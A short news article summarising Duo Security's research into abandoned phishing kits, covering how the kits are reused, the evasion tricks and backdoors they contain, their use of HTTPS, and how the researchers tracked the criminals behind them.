The people behind phishing attacks are always looking for ways to improve their profitability. They quite often re-use material by bundling site resources into a phishing kit, uploading that kit to a server and sending a new batch of emails.
Sometimes though they get careless and leave the kits behind allowing them to be analyzed. Trusted access specialist Duo Security carried out a month-long experiment to track down these abandoned kits.
Over the course of the study it found more than 3,200 unique phishing kits, tracked the actors behind the kits, identified kit re-use across sites and more. To create a new phishing site, attackers first clone the legitimate site they want to spoof, then change the login form to point to a simple PHP script. The script then collects credentials and either emails them to the attacker or logs them to a text file.
Duo studied 66,000 URLs from threat intelligence sites and found more than 7,800 phishing kits. This indicates that multiple URLs with different paths are occasionally submitted to the threat intelligence aggregators resulting in the same kit being discovered multiple times, and that some phishing kits are reused across multiple sites.
In an effort to avoid detection, the criminals frequently add a .htaccess file to the phishing kit that blocks connections based on HTTP request attributes, so they can block IP ranges from threat intelligence servers.
R&D Engineer at Duo Security, Jordan Wright says, “Hackers will trade phishing kits with one another so they don’t have to put in the work to build them themselves. We also found that many of these kits have a backdoor, where anyone — including the original creator of the kit — can come along and run commands on the host.”
It also found that the hackers are targeting popular content management systems like WordPress which make easy targets for attackers if they’re not kept up to date. The industry trend towards increased use of HTTPS is also extending into phishing sites, with over 16 percent of recorded samples served over HTTPS, exploiting users’ trust in the ‘secure’ browser indication.
“We also wanted to track the people behind the kits,” adds Wright. “In many instances you can see multiple email addresses connected to the same phishing kit, allowing us to map out the landscape of which hackers are doing which campaigns. This helps us figure out what’s going on and who’s behind it. In another instance we found one email address in 115 unique phishing kits, showing that they’re being adapted, changed and re-used.”
You can find out more about the analysis and download the full report on the Duo blog.